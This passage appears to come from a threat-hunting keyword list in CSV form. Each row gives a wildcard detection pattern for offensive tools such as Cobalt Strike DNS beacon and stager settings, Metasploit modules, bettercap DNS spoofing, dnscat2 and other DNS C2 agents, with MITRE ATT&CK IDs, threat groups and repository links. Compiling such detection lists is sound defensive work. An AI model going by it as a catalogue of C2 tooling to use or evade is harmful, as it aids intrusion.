- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_sleep*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_ttl*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_get_A*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_get_TXT*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_maxdns*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_ns_response*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_put_metadata*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_put_output*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_bruteforce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dns_redir.sh *,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*dns_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*'dns_stager_prepend'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*'dns_stager_subhost'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*dnsadmin_serverlevelplugindll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DNSAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*dns-beacon *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*DNS-C2 #>*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnscan-master*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*dnscat -*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control 